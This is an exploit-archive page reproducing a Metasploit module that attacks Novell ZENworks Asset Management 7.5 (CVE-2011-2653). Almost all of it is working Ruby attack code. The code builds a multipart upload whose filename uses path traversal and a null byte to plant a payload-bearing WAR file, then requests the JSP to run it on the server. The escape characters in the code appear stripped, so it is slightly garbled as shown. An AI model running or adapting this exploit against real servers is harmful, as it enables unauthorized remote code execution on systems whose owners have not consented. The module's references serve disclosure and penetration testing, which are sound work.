[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Novell ZENworks Asset Management Remote Execution
# Published : 2012-08-15
# Author :
# Previous Title : Turbo FTP Server 1.30.823 PORT Overflow
# Next Title : Java 7 Applet Remote Code Execution
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Novell ZENworks Asset Management Remote Execution',
'Description' => %q{
This module exploits a path traversal flaw in Novell ZENworks Asset Management
7.5. By exploiting the CatchFileServlet, an attacker can upload a malicious file
outside of the MalibuUploadDirectory and then make a secondary request that allows
for arbitrary code execution.
},
'Author' =>
[
'Unknown', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2011-2653' ],
[ 'OSVDB', '77583' ],
[ 'BID', '50966' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-342/' ],
[ 'URL', 'http://download.novell.com/Download?buildid=hPvHtXeNmCU~' ]
],
'Privileged' => true,
'Platform' => [ 'java' ],
'Targets' =>
[
[ 'Java Universal',
{
'Arch' => ARCH_JAVA,
'Platform' => 'java'
},
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 02 2011'))
register_options(
[
Opt::RPORT(8080),
OptInt.new('DEPTH', [true, 'Traversal depth to reach the Tomcat webapps dir', 3])
], self.class )
end
def exploit
# Generate the WAR containing the payload
app_base = rand_text_alphanumeric(4+rand(32-4))
jsp_name = rand_text_alphanumeric(8+rand(8))
war_data = payload.encoded_war(:app_name => app_base, :jsp_name => jsp_name).to_s
uid = rand_text_alphanumeric(34).to_s
data = "------#{uid}rn"
data << "Content-Disposition: form-data; name="RequestParms"rnrn"
data << "rn"
data << "------#{uid}rn"
data << "Content-Disposition: form-data; name="language"rnrn"
data << "rn"
data << "------#{uid}rn"
data << "Content-Disposition: form-data; name="rtyp"rnrn"
data << "prodrn"
data << "------#{uid}rn"
data << "Content-Disposition: form-data; name="sess"rnrn"
data << "rn"
data << "------#{uid}rn"
data << "Content-Disposition: form-data; name="mode"rnrn"
data << "newreportrn"
data << "------#{uid}rn"
data << "Content-Disposition: form-data; name="dp"rnrn"
data << "nrn"
data << "------#{uid}rn"
data << "Content-Disposition: form-data; name="console"rnrn"
data << "rn"
data << "------#{uid}rn"
data << "Content-Disposition: form-data; name="oldentry"rnrn"
data << "rn"
data << "------#{uid}rn"
data << "Content-Disposition: form-data; name="act"rnrn"
data << "malibu.StartImportPACrn"
data << "------#{uid}rn"
data << "Content-Disposition: form-data; name="saveact"rnrn"
data << "malibu.StartImportPACrn"
data << "------#{uid}rn"
data << "Content-Disposition: form-data; name="isalert"rnrn"
data << "rn"
data << "------#{uid}rn"
data << "Content-Disposition: form-data; name="language"rnrn"
data << "rn"
data << "------#{uid}rn"
data << "Content-Disposition: form-data; name="queryid"rnrn"
data << "rn"
data << "------#{uid}rn"
data << "Content-Disposition: form-data; name="Locale"rnrn"
data << "MM/dd/yyyyrn"
data << "------#{uid}rn"
data << "Content-Disposition: form-data; name="CurrencySym"rnrn"
data << "$rn"
data << "------#{uid}rn"
data << "Content-Disposition: form-data; name="CurrencyPos"rnrn"
data << "startrn"
data << "------#{uid}rn"
data << "Content-Disposition: form-data; name="ThousandsSep"rnrn"
data << ",rn"
data << "------#{uid}rn"
data << "Content-Disposition: form-data; name="CurDecimalPt"rnrn"
data << ".rn"
data << "------#{uid}rn"
data << "Content-Disposition: form-data; name="MinusSign"rnrn"
data << "-rn"
data << "------#{uid}rn"
data << "Content-Disposition: form-data; name="sum"rnrn"
data << "rn"
data << "------#{uid}rn"
data << "Content-Disposition: form-data; name="grp"rnrn"
data << "rn"
data << "------#{uid}rn"
data << "Content-Disposition: form-data; name="col"rnrn"
data << "rn"
data << "------#{uid}rn"
data << "Content-Disposition: form-data; name="PreLoadRight"rnrn"
data << "yesrn"
data << "------#{uid}rn"
data << "Content-Disposition: form-data; name="console"rnrn"
data << "rn"
data << "------#{uid}rn"
data << "Content-Disposition: form-data; name="uploadFile"; filename="/#{"../" * datastore['DEPTH']}#{app_base}.warx00.txt"rn"
data << "Content-Type: application/octet-streamrnrn"
data << war_data
data << "rn"
data << "------#{uid}rn"
data << "Content-Disposition: form-data; name="SuccessPage"rnrn"
data << "Html/UploadSuccess.htmlrn"
data << "------#{uid}--rn"
res = send_request_cgi(
{
'uri' => "/rtrlet/catch",
'method' => 'POST',
'ctype' => "multipart/form-data; boundary=----#{uid}",
'data' => data,
})
print_status("Uploading #{war_data.length} bytes as #{app_base}.war ...")
select(nil, nil, nil, 10)
if (res.code == 500)
print_status("Triggering payload at '/#{app_base}/#{jsp_name}.jsp' ...")
send_request_raw(
{
'uri' => "/#{app_base}/" + "#{jsp_name}" + '.jsp',
'method' => 'GET',
})
else
print_error("WAR upload failed...")
end
end
end